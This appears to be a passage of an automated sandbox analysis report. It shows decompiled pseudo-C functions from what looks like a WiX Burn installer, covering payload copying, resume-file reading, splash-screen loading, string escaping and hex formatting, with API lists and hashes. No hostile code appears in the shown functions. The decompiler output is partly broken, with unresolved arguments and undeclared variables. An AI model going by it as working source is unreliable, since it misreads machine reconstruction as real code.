                                                                                                                                                                  • Failed to concat file paths., xrefs: 00407EE8
                                                                                                                                                                  • Failed to get next stream., xrefs: 00407EF9
                                                                                                                                                                  • Failed to get directory portion of local file path, xrefs: 00407EE1
                                                                                                                                                                  • Failed to find embedded payload: %ls, xrefs: 00407EF2
                                                                                                                                                                  • Failed to extract file., xrefs: 00407ECB
                                                                                                                                                                  • Failed to ensure directory exists, xrefs: 00407ED2
                                                                                                                                                                  • payload.cpp, xrefs: 00407F0B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                                                                  • API String ID: 1825529933-1711239286
                                                                                                                                                                  • Opcode ID: 60a90c6fb80e5f63e41a217f44e421bc4af4f59a78ce993618baca79df0c869d
                                                                                                                                                                  • Instruction ID: af8b5e66ab837dc1f61522e2b4aea987b3af3f3ffa603aec968b5071cfad2356
                                                                                                                                                                  • Opcode Fuzzy Hash: 60a90c6fb80e5f63e41a217f44e421bc4af4f59a78ce993618baca79df0c869d
                                                                                                                                                                  • Instruction Fuzzy Hash: 1651C131D0A225EBCB119F55C841AAEBBB4BF44710F2081BBE9017B2D1D378AD41DBDA
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                                  			E004203C0(void* __ecx, void* _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                                                                                  				long _v8;
                                                                                                                                                                  				intOrPtr* _t22;
                                                                                                                                                                  				void* _t24;
                                                                                                                                                                  				signed short _t29;
                                                                                                                                                                  				signed short _t31;
                                                                                                                                                                  				signed int _t36;
                                                                                                                                                                  				long _t37;
                                                                                                                                                                  				signed short _t39;
                                                                                                                                                                  				intOrPtr _t46;
                                                                                                                                                                  				WCHAR* _t47;
                                                                                                                                                                  				signed short _t50;
                                                                                                                                                                  				intOrPtr _t52;
                                                                                                                                                                  				void* _t54;
                                                                                                                                                                  				long _t57;
                                                                                                                                                                  				signed short _t61;
                                                                                                                                                                  
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_t54 = _a4;
                                                                                                                                                                  				_t57 = 0;
                                                                                                                                                                  				_t22 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t46 = 0x43b580;
                                                                                                                                                                  				if(_t22 == 0) {
                                                                                                                                                                  					_t50 =  *(_t54 + 8);
                                                                                                                                                                  					__eflags = _t50;
                                                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                                                  						_t52 = 0x43b580;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t52 =  *_t50;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t52 =  *_t22;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t51 =  *((intOrPtr*)(_t54 + 0xc));
                                                                                                                                                                  				if(_t51 != 0) {
                                                                                                                                                                  					_t46 =  *_t51;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t22 == 0) {
                                                                                                                                                                  					__eflags =  *(_t54 + 8) - _t57;
                                                                                                                                                                  					_t51 = 0x20000152;
                                                                                                                                                                  					_t24 =  !=  ? 0x20000152 : 0x2000014f;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t72 = _t51;
                                                                                                                                                                  					_t24 = (0 | _t51 != 0x00000000) + 0x20000150;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push(_a8);
                                                                                                                                                                  				_push("copy");
                                                                                                                                                                  				_push(_t46);
                                                                                                                                                                  				E00402003(2, _t24, _t52);
                                                                                                                                                                  				_t47 = _a12;
                                                                                                                                                                  				if(E00436AF7(_t51, _t72, _t47,  &_v8) == 0) {
                                                                                                                                                                  					L14:
                                                                                                                                                                  					_t17 = _t54 + 0x20; // 0x20
                                                                                                                                                                  					_t29 = CopyFileExW(_a8, _t47, E004202B5, _t54, _t17, _t57);
                                                                                                                                                                  					__eflags = _t29;
                                                                                                                                                                  					if(_t29 == 0) {
                                                                                                                                                                  						__eflags =  *(_t54 + 0x20) - _t57;
                                                                                                                                                                  						if( *(_t54 + 0x20) == _t57) {
                                                                                                                                                                  							_t31 = GetLastError();
                                                                                                                                                                  							__eflags = _t31;
                                                                                                                                                                  							_t61 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							__eflags = _t61;
                                                                                                                                                                  							_t57 =  >=  ? 0x80004005 : _t61;
                                                                                                                                                                  							E004300D9(0x80004005, "apply.cpp", 0x54e, _t57);
                                                                                                                                                                  							_push(_t47);
                                                                                                                                                                  							_push(_a8);
                                                                                                                                                                  							_push("Failed attempt to copy payload from: \'%ls\' to: %ls.");
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t57 = 0x80070642;
                                                                                                                                                                  							E004300D9(_t29, "apply.cpp", 0x54a, 0x80070642);
                                                                                                                                                                  							_push(_t47);
                                                                                                                                                                  							_push(_a8);
                                                                                                                                                                  							_push("BA aborted copy of payload from: \'%ls\' to: %ls.");
                                                                                                                                                                  						}
                                                                                                                                                                  						_push(_t57);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L19;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t36 = _v8;
                                                                                                                                                                  					if((_t36 & 0x00000001) == 0) {
                                                                                                                                                                  						goto L14;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t37 = _t36 & 0xfffffffe;
                                                                                                                                                                  					_v8 = _t37;
                                                                                                                                                                  					if(SetFileAttributesW(_t47, _t37) != 0) {
                                                                                                                                                                  						goto L14;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t39 = GetLastError();
                                                                                                                                                                  					_t64 =  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t57 =  >=  ? 0x80004005 :  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "apply.cpp", 0x540, _t57);
                                                                                                                                                                  					E00430A57(_t57, "Failed to clear readonly bit on payload destination path: %ls", _t47);
                                                                                                                                                                  					L19:
                                                                                                                                                                  					return _t57;
                                                                                                                                                                  				}
                                                                                                                                                                  			}



















                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000002,00000000,00000002,00000000,?,?,?,00000002,00000000,00000000,?,?,004216F9,?,00000001,00000000), ref: 0042044A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000002,00000000,00000000,?,?,004216F9,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00420454
                                                                                                                                                                  • CopyFileExW.KERNEL32(00000002,00000002,004202B5,00000000,00000020,00000000,00000002,00000000,?,?,?,00000002,00000000,00000000), ref: 004204A2
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000002,00000000,00000000,?,?,004216F9,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 004204D1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$AttributesCopy
                                                                                                                                                                  • String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
                                                                                                                                                                  • API String ID: 1969131206-836986073
                                                                                                                                                                  • Opcode ID: 56e4219a89a8ff47d8d6136928a796f6201c8b2cfb16e3596f976df49e025c21
                                                                                                                                                                  • Instruction ID: 0f9840f5b1fe56266f56d8fad70d032d738c8dda4a0851daa1574958319ed0be
                                                                                                                                                                  • Opcode Fuzzy Hash: 56e4219a89a8ff47d8d6136928a796f6201c8b2cfb16e3596f976df49e025c21
                                                                                                                                                                  • Instruction Fuzzy Hash: E831E471B00625BBF710AA66AC85F7B72ECEF08755B50812BBD05E7282D779CD0186EC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                  			E004254B6(void* __ecx, intOrPtr _a4, WCHAR** _a8, void** _a12, signed int* _a16) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				void* _t24;
                                                                                                                                                                  				signed short _t28;
                                                                                                                                                                  				signed short _t36;
                                                                                                                                                                  				signed int* _t42;
                                                                                                                                                                  				intOrPtr _t45;
                                                                                                                                                                  				WCHAR** _t48;
                                                                                                                                                                  				void* _t49;
                                                                                                                                                                  				void* _t52;
                                                                                                                                                                  
                                                                                                                                                                  				_t42 = _a16;
                                                                                                                                                                  				_t48 = _a8;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				 *_t42 = 0;
                                                                                                                                                                  				_t42[1] = 0;
                                                                                                                                                                  				_t52 = E00413C6F(_a4, _t48);
                                                                                                                                                                  				if(_t52 >= 0) {
                                                                                                                                                                  					_t49 = CreateFileW( *_t48, 0xc0000000, 4, 0, 4, 0x80, 0);
                                                                                                                                                                  					if(_t49 != 0xffffffff) {
                                                                                                                                                                  						_t45 = _v8;
                                                                                                                                                                  						while(1) {
                                                                                                                                                                  							_push(0);
                                                                                                                                                                  							_push( &_v12);
                                                                                                                                                                  							_t24 = 8;
                                                                                                                                                                  							if(ReadFile(_t49, _t45 + _t42, _t24 - _t45, ??, ??) == 0) {
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t45 = _v8 + _v12;
                                                                                                                                                                  							_v8 = _t45;
                                                                                                                                                                  							if(_v12 == 0 || _t45 >= 8) {
                                                                                                                                                                  								if(_t45 != 8) {
                                                                                                                                                                  									 *_t42 =  *_t42 & 0x00000000;
                                                                                                                                                                  									_t42[1] = _t42[1] & 0x00000000;
                                                                                                                                                                  								}
                                                                                                                                                                  								 *_a12 = _t49;
                                                                                                                                                                  								_t49 = _t49 | 0xffffffff;
                                                                                                                                                                  								L13:
                                                                                                                                                                  								if(_t49 != 0xffffffff) {
                                                                                                                                                                  									CloseHandle(_t49);
                                                                                                                                                                  								}
                                                                                                                                                                  								L15:
                                                                                                                                                                  								return _t52;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								continue;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  						_t28 = GetLastError();
                                                                                                                                                                  						_t55 =  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t52 =  >=  ? 0x80004005 :  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "downloadengine.cpp", 0xda, _t52);
                                                                                                                                                                  						E00430A57(_t52, "Failed to read resume file: %ls",  *_a8);
                                                                                                                                                                  						goto L13;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t36 = GetLastError();
                                                                                                                                                                  					_t59 =  <=  ? _t36 : _t36 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t52 =  >=  ? 0x80004005 :  <=  ? _t36 : _t36 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "downloadengine.cpp", 0xd3, _t52);
                                                                                                                                                                  					_push( *_a8);
                                                                                                                                                                  					_push("Failed to create resume file: %ls");
                                                                                                                                                                  					L2:
                                                                                                                                                                  					_push(_t52);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  					goto L15;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push(_a4);
                                                                                                                                                                  				_push("Failed to calculate resume path from working path: %ls");
                                                                                                                                                                  				goto L2;
                                                                                                                                                                  			}














                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000000,75C08550,?,?,?,00425DB5), ref: 0042550A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00425DB5,?,?,000000FF,?,?,?,00000078,00000000,00000000,?,?,?), ref: 00425517
                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000008,00000008,00000000,00000000,?,?,?,00425DB5,?,?,000000FF,?,?,?,00000078), ref: 00425565
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00425DB5,?,?,000000FF,?,?,?,00000078,00000000,00000000,?,?,?), ref: 00425599
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,WiX\Burn,DownloadTimeout,00000078,?), ref: 004255E0
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to create resume file: %ls, xrefs: 0042554A
                                                                                                                                                                  • downloadengine.cpp, xrefs: 0042553B, 004255BD
                                                                                                                                                                  • Failed to calculate resume path from working path: %ls, xrefs: 004254E3
                                                                                                                                                                  • Failed to read resume file: %ls, xrefs: 004255CC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                                  • String ID: Failed to calculate resume path from working path: %ls$Failed to create resume file: %ls$Failed to read resume file: %ls$downloadengine.cpp
                                                                                                                                                                  • API String ID: 3160720760-919322122
                                                                                                                                                                  • Opcode ID: 1869560bf48bc83ee5751bd7061e81349eb168691e153f30b478099af5cb8f99
                                                                                                                                                                  • Instruction ID: fc5a16695955bf73d266ea5bec4604439a4f7e92c7ebd3acd4e958904c9fed18
                                                                                                                                                                  • Opcode Fuzzy Hash: 1869560bf48bc83ee5751bd7061e81349eb168691e153f30b478099af5cb8f99
                                                                                                                                                                  • Instruction Fuzzy Hash: A231FA71B00620BFEB209F69EC45B6E77A5EF05751F114216FD01EB2D0D778894087A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                  			E1001A4E0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char* _a4) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				char _v164;
                                                                                                                                                                  				intOrPtr _v168;
                                                                                                                                                                  				intOrPtr _v172;
                                                                                                                                                                  				intOrPtr _v176;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				void* _t36;
                                                                                                                                                                  				void* _t75;
                                                                                                                                                                  				void* _t80;
                                                                                                                                                                  				void* _t81;
                                                                                                                                                                  
                                                                                                                                                                  				_t74 = __esi;
                                                                                                                                                                  				_t73 = __edi;
                                                                                                                                                                  				_t57 = __ebx;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v176 = L1000CEAF(__ebx, __edx, __edi, __esi, 0x10);
                                                                                                                                                                  				_v168 = L1000CEAF(__ebx, __edx, __edi, __esi, 0x21);
                                                                                                                                                                  				E1000CF80(__edi, _v168, 0, 0x21);
                                                                                                                                                                  				E1000CF80(_t73, _v176, 0, 0x10);
                                                                                                                                                                  				_t67 = _a4;
                                                                                                                                                                  				_t36 = E1000CAD0(_a4);
                                                                                                                                                                  				_t80 = _t75 + 0x24;
                                                                                                                                                                  				if(_t36 <= 0) {
                                                                                                                                                                  					E1000E2E0(_v168, "00000000000000000000000000000000");
                                                                                                                                                                  					_t81 = _t80 + 8;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					E1001BC70( &_v164);
                                                                                                                                                                  					E1001CB20( &_v164, _a4, E1000CAD0(_a4));
                                                                                                                                                                  					_t67 =  &_v164;
                                                                                                                                                                  					E1001CC20( &_v164, _v176);
                                                                                                                                                                  					_t81 = _t80 + 0x1c;
                                                                                                                                                                  					_v8 = 0;
                                                                                                                                                                  					while(_v8 < 0x10) {
                                                                                                                                                                  						_t67 = _v168 + _v8 * 2;
                                                                                                                                                                  						E1000CCA3(_t73, _v168 + _v8 * 2, "%02X",  *(_v176 + _v8) & 0xff);
                                                                                                                                                                  						_t81 = _t81 + 0xc;
                                                                                                                                                                  						_v8 = _v8 + 1;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				_push(_v176);
                                                                                                                                                                  				E1000CA40(_t57, _t73, _t74, __eflags);
                                                                                                                                                                  				_v172 = L1000CEAF(_t57, _t67, _t73, _t74, 0x11);
                                                                                                                                                                  				E1000CF80(_t73, _v172, 0, 0x11);
                                                                                                                                                                  				__eflags = _v168 + 8;
                                                                                                                                                                  				E1000D1F0(_t57, _t73, _t74, _v172, _v168 + 8, 0x10);
                                                                                                                                                                  				_push(_v168);
                                                                                                                                                                  				E1000CA40(_t57, _t73, _t74, __eflags);
                                                                                                                                                                  				return _v172;
                                                                                                                                                                  			}














                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_strlenund_memcpy$_sprintf_strcat
                                                                                                                                                                  • String ID: %02X$00000000000000000000000000000000
                                                                                                                                                                  • API String ID: 796335831-606320477
                                                                                                                                                                  • Opcode ID: 1038390b883c05b411ff430f9458984f015da90a2c3e3efe0500212fe4d55d5b
                                                                                                                                                                  • Instruction ID: 0e7775b8e07c3591b5db09e074d1c70b9db2800ece633bf375f61c4185d71463
                                                                                                                                                                  • Opcode Fuzzy Hash: 1038390b883c05b411ff430f9458984f015da90a2c3e3efe0500212fe4d55d5b
                                                                                                                                                                  • Instruction Fuzzy Hash: B23131B9E0031CAFEB10D760DC42F9E7775DB85304F0444A4F5496B246EA71AA949B93
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E004170C3(struct HINSTANCE__* _a4, void** _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                  				struct tagMONITORINFO _v48;
                                                                                                                                                                  				struct tagPOINT _v56;
                                                                                                                                                                  				void* _v72;
                                                                                                                                                                  				void* _v76;
                                                                                                                                                                  				void _v80;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t33;
                                                                                                                                                                  				int _t36;
                                                                                                                                                                  				void* _t38;
                                                                                                                                                                  				struct HMONITOR__* _t44;
                                                                                                                                                                  				signed short _t60;
                                                                                                                                                                  				void** _t64;
                                                                                                                                                                  				signed int _t65;
                                                                                                                                                                  				void* _t67;
                                                                                                                                                                  				struct HINSTANCE__* _t75;
                                                                                                                                                                  				void* _t78;
                                                                                                                                                                  				void* _t79;
                                                                                                                                                                  				void* _t80;
                                                                                                                                                                  				signed int _t84;
                                                                                                                                                                  
                                                                                                                                                                  				_t33 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t33 ^ _t84;
                                                                                                                                                                  				_t75 = _a4;
                                                                                                                                                                  				_t64 = _a8;
                                                                                                                                                                  				_t65 = 6;
                                                                                                                                                                  				_t36 = memset( &_v80, 0, _t65 << 2);
                                                                                                                                                                  				_t67 = 0xa;
                                                                                                                                                                  				_t80 = 0;
                                                                                                                                                                  				_t78 =  &_v48;
                                                                                                                                                                  				_v56.x = 0;
                                                                                                                                                                  				_v56.y = 0;
                                                                                                                                                                  				memset(_t78, _t36, 0 << 2);
                                                                                                                                                                  				_t79 = _t78 + _t67;
                                                                                                                                                                  				_t38 = LoadBitmapW(_t75, 1);
                                                                                                                                                                  				 *_t64 = _t38;
                                                                                                                                                                  				if(_t38 != 0) {
                                                                                                                                                                  					GetObjectW(_t38, 0x18,  &_v80);
                                                                                                                                                                  					_t64[1] = 0x80000000;
                                                                                                                                                                  					_t64[2] = 0x80000000;
                                                                                                                                                                  					_t64[3] = _v76;
                                                                                                                                                                  					_t64[4] = _v72;
                                                                                                                                                                  					_t44 = GetCursorPos( &_v56);
                                                                                                                                                                  					if(_t44 != 0) {
                                                                                                                                                                  						__imp__MonitorFromPoint(_v56.x, _v56.y, 2);
                                                                                                                                                                  						if(_t44 != 0) {
                                                                                                                                                                  							_v48.cbSize = 0x28;
                                                                                                                                                                  							if(GetMonitorInfoW(_t44,  &_v48) != 0) {
                                                                                                                                                                  								asm("cdq");
                                                                                                                                                                  								_t64[1] = (_v20 - _t64[3] - _v48.rcWork - _t75 >> 1) + _v48.rcWork;
                                                                                                                                                                  								asm("cdq");
                                                                                                                                                                  								_t64[2] = (_v16 - _t64[4] - _v24 - _t75 >> 1) + _v24;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t60 = GetLastError();
                                                                                                                                                                  					_t83 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t80 =  >=  ? 0x80004005 :  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "splashscreen.cpp", 0xf3, _t80);
                                                                                                                                                                  					_push("Failed to load splash screen bitmap.");
                                                                                                                                                                  					_push(_t80);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				return L004267AF(_t80, _v8 ^ _t84, _t79, _t80);
                                                                                                                                                                  			}




























                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadBitmapW.USER32 ref: 004170F9
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417105
                                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0041714C
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0041716D
                                                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 0041717F
                                                                                                                                                                  • GetMonitorInfoW.USER32 ref: 00417195
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
                                                                                                                                                                  • String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
                                                                                                                                                                  • API String ID: 2342928100-598475503
                                                                                                                                                                  • Opcode ID: 34cd428255bf90af31af52cef1b95fab7a9fc3b203366189d0c4d7b370d05086
                                                                                                                                                                  • Instruction ID: 1b011324ee609301b53d9b178e90619b304c2a8141791c40f3ac01c4d621cd5b
                                                                                                                                                                  • Opcode Fuzzy Hash: 34cd428255bf90af31af52cef1b95fab7a9fc3b203366189d0c4d7b370d05086
                                                                                                                                                                  • Instruction Fuzzy Hash: 00313075A00215AFDB10DFB9DD85B9EBBF4EF08710F14812AE905EB284DB74E900CBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 49%
                                                                                                                                                                  			E00403999(void* __ebx, void* __ecx, WCHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				signed int _t38;
                                                                                                                                                                  				void* _t42;
                                                                                                                                                                  				WCHAR* _t48;
                                                                                                                                                                  				WCHAR* _t49;
                                                                                                                                                                  				void* _t52;
                                                                                                                                                                  				void* _t54;
                                                                                                                                                                  
                                                                                                                                                                  				_t40 = __ecx;
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                                                                                                  				_t48 = _a4;
                                                                                                                                                                  				_t52 = E00433BDF( &_v8, lstrlenW(_t48) + 1);
                                                                                                                                                                  				if(_t52 >= 0) {
                                                                                                                                                                  					while(1) {
                                                                                                                                                                  						_t38 = E00426F42(_t40, _t48, L"[]{}");
                                                                                                                                                                  						_pop(_t42);
                                                                                                                                                                  						if(_t38 == 0) {
                                                                                                                                                                  							goto L5;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t52 = E00433C35(_t42,  &_v8, _t48, _t38);
                                                                                                                                                                  						if(_t52 < 0) {
                                                                                                                                                                  							_push("Failed to append characters.");
                                                                                                                                                                  							L14:
                                                                                                                                                                  							_push(_t52);
                                                                                                                                                                  							E00430A57();
                                                                                                                                                                  						} else {
                                                                                                                                                                  							goto L5;
                                                                                                                                                                  						}
                                                                                                                                                                  						L15:
                                                                                                                                                                  						goto L16;
                                                                                                                                                                  						L5:
                                                                                                                                                                  						_t49 =  &(_t48[_t38]);
                                                                                                                                                                  						_t40 = 0;
                                                                                                                                                                  						_t24 =  *_t49 & 0x0000ffff;
                                                                                                                                                                  						if(0 == ( *_t49 & 0x0000ffff)) {
                                                                                                                                                                  							_t52 = E00433F88(_a8, _v8, 0);
                                                                                                                                                                  							if(_t52 < 0) {
                                                                                                                                                                  								_push("Failed to copy string.");
                                                                                                                                                                  								goto L14;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t52 = E00433CEA( &_v12, L"[\\%c]", _t24);
                                                                                                                                                                  							_t54 = _t54 + 0xc;
                                                                                                                                                                  							if(_t52 < 0) {
                                                                                                                                                                  								_push("Failed to format escape sequence.");
                                                                                                                                                                  								goto L14;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t52 = E00433C35(0,  &_v8, _v12, 0);
                                                                                                                                                                  								if(_t52 < 0) {
                                                                                                                                                                  									_push("Failed to append escape sequence.");
                                                                                                                                                                  									goto L14;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t48 =  &(_t49[1]);
                                                                                                                                                                  									continue;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L15;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to allocate buffer for escaped string.");
                                                                                                                                                                  					_push(_t52);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				L16:
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					E004380AB(_v8);
                                                                                                                                                                  				}
